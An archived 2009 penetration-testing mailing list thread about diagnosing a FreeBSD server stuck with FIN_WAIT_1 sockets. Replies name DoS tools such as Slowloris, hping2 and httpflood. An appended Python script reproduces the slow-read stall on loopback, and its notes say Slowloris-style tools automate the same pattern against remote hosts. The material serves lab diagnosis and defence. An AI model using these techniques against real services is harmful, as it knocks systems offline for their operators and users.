Penetration Testing mailing list archives

Re: DOS attack tool can be used in lab


From: madunix <madunix () gmail com>
Date: Fri, 11 Sep 2009 11:56:27 +0300

hping2, httpflood, or any DDoS tool scripts in Perl or Python
-mu

On Wed, Sep 9, 2009 at 9:14 PM, R. DuFresne <dufresne () sysinfo com> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Which only prevents the internal network from being traumatized.  The
external link would still be hosed, at least it would be if the pipe sending
SYNs exceeds the receiving pipe.  Resource exhaustion and pipe flooding are
rather difficult to defend against.  Most often the only recourse is to go
further up your network stream to seek a larger pipe there to filter for
you.  It's the price you pay for the game you play.


thanks,


Ron DuFresne


On Wed, 9 Sep 2009, Robert Portvliet wrote:

You could set a firewall rule to drop any incoming SYN packets from
the Internet, which is a very good idea anyway unless you have some
specific need for it (ie: this machine is on the DMZ & is a web
server).

On Mon, Sep 7, 2009 at 7:38 AM, L. Pop <zhiglee () gmail com> wrote:

Thanks for your help!

Now I am clear about how we got attacked:
first they established a TCP connection with us, then they just ignored
our "FIN" packet;
the server has to resend the packet 12 times, then sends a RST packet to give
up.
The interval of retry gradually increases:
  [1st] 1s plus/minus 0.5s
  [2nd] 3s plus/minus 0.5s
  [3rd] 6s plus/minus 0.5s
  ....
  [7th] 64s plus/minus 0.5s
  [8th] 64s plus/minus 0.5s
  ....
  [12th] 64s plus/minus 0.5s


However, I am not confident about changing those parameters; after all, those
settings apply to all TCP sessions. My OS is FreeBSD 6.4.

Still need your help on how to prevent such attack.

Kind Regards,
Pop


2009/9/3 HD Moore <hdm () digitaloffense net>:

On Wed, 2009-09-02 at 11:28 +0800, L. Pop wrote:

Hi Guys,

Recently one of our FreeBSD servers always experiences "Socket: No
buffer space available..." errors, and there are too many FIN_WAIT_1s
in the system; it is likely that we are being DoSed.


Is there any handy DoS simulation tool that I can use in the lab to
reproduce the problem? Thanks in advance!


This issue occurs when your side of the connection is trying to send
data, but the remote side stops receiving it (reduces the TCP window to
0 or a small value). With enough of these sessions, you start to hit
that message. I believe you can reproduce this with Slowloris:

http://ha.ckers.org/blog/20090617/slowloris-http-dos/



------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require a
full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------






- -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       admin & senior security consultant:  sysinfo.com
                       http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

These things happened. They were glorious and they changed the world...,
and then we fucked up the endgame.    --Charlie Wilson
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFKp/CFst+vzJSwZikRAj7xAKDWCxUZR6lNzyhcAJDP4WCCpIpcqgCgvQya
zHEbe+xXVk42I06T5K864Us=
=vmQx
-----END PGP SIGNATURE-----





-- 
http://madunix.googlepages.com/
http://madunixblog.blogspot.com/
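The condition HD Moore describes (the remote side stops reading, the server's send buffer fills, and after close() the unacknowledged data leaves the socket in FIN_WAIT_1 while the kernel retransmits) can be reproduced on loopback without any third-party tool. The script below is an added example for the lab and is not code from any poster in this thread; the buffer sizes, the payload size and the request line are arbitrary choices made here, and it only stalls connections, it does not by itself drive a box to "No buffer space available" (that needs many more concurrent connections than a single script should open on a shared host).

```python
"""Lab reproduction of the stalled-receiver / FIN_WAIT_1 condition discussed
in the thread.  Added example, not from any poster.  Runs entirely on loopback:
a 'victim' listener pushes data to clients that connect, send one request and
then never read, so the victim's send buffer fills; when the victim close()s,
the FIN sits behind unacknowledged data and the socket stays in FIN_WAIT_1
while the victim kernel retransmits."""
import select
import socket

RCVBUF = 4096              # tiny receive window on the "attacker" side (assumed)
SNDBUF = 16384             # small victim send buffer so the stall shows quickly
PAYLOAD = 4 * 1024 * 1024  # bytes the victim tries to push per connection
STALL_WAIT = 0.5           # seconds with no progress before we call it stalled
REQUEST = b"GET / HTTP/1.0\r\n\r\n"   # constructed request line


def start_victim(host="127.0.0.1"):
    """Listening socket standing in for the server under attack."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))       # ephemeral port
    srv.listen(128)
    return srv


def open_stalled_client(addr):
    """Connect, send one request, then never read.  SO_RCVBUF must be set
    before connect() so the advertised window is small from the start."""
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, RCVBUF)
    c.connect(addr)
    c.sendall(REQUEST)
    return c


def victim_serve_one(srv):
    """Accept one connection, read the request, push PAYLOAD bytes without
    blocking, and close.  Returns how many bytes the kernel accepted before
    the peer stopped making progress (always < PAYLOAD when the peer never
    reads)."""
    conn, _ = srv.accept()
    conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SNDBUF)
    conn.settimeout(5)
    conn.recv(4096)           # consume the request (blocking, with timeout)
    conn.setblocking(False)
    chunk = b"A" * 65536
    sent = 0
    while sent < PAYLOAD:
        try:
            sent += conn.send(chunk[: PAYLOAD - sent])
        except BlockingIOError:
            # Send buffer full.  If the peer drains anything we continue;
            # if it stays unwritable for STALL_WAIT the receiver is stalled.
            _, writable, _ = select.select([], [conn], [], STALL_WAIT)
            if not writable:
                break
    conn.close()              # FIN queued behind unacked data -> FIN_WAIT_1
    return sent


def run_lab(n_connections=20):
    """Open n stalled connections against the loopback victim.  Returns the
    bytes pushed on each connection and the still-open client sockets.  Keep
    the clients alive while inspecting the victim: closing a client socket
    that still holds unread data makes its kernel answer with RST, which
    clears the victim's FIN_WAIT_1 entry immediately."""
    srv = start_victim()
    addr = srv.getsockname()
    clients, pushed = [], []
    for _ in range(n_connections):
        clients.append(open_stalled_client(addr))
        pushed.append(victim_serve_one(srv))
    return pushed, clients


if __name__ == "__main__":
    import time
    pushed, clients = run_lab()
    print(f"{len(pushed)} connections stalled after "
          f"{min(pushed)}-{max(pushed)} bytes each")
    print("in another terminal: netstat -an | grep FIN_WAIT_1")
    time.sleep(60)            # hold the window closed while you look
    for c in clients:
        c.close()
```

While the script sleeps, `netstat -an` on the same host shows one FIN_WAIT_1 entry per connection with a non-zero send queue, which is the state L. Pop reported; the retransmission schedule he lists is what the victim kernel is doing with that queued data. The same pattern against a real service on a remote host is what the Slowloris-style tools automate, but with a real pipe in between the numbers (and the mbuf pressure) scale with the number of connections the attacker can hold open, not with this script's defaults.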


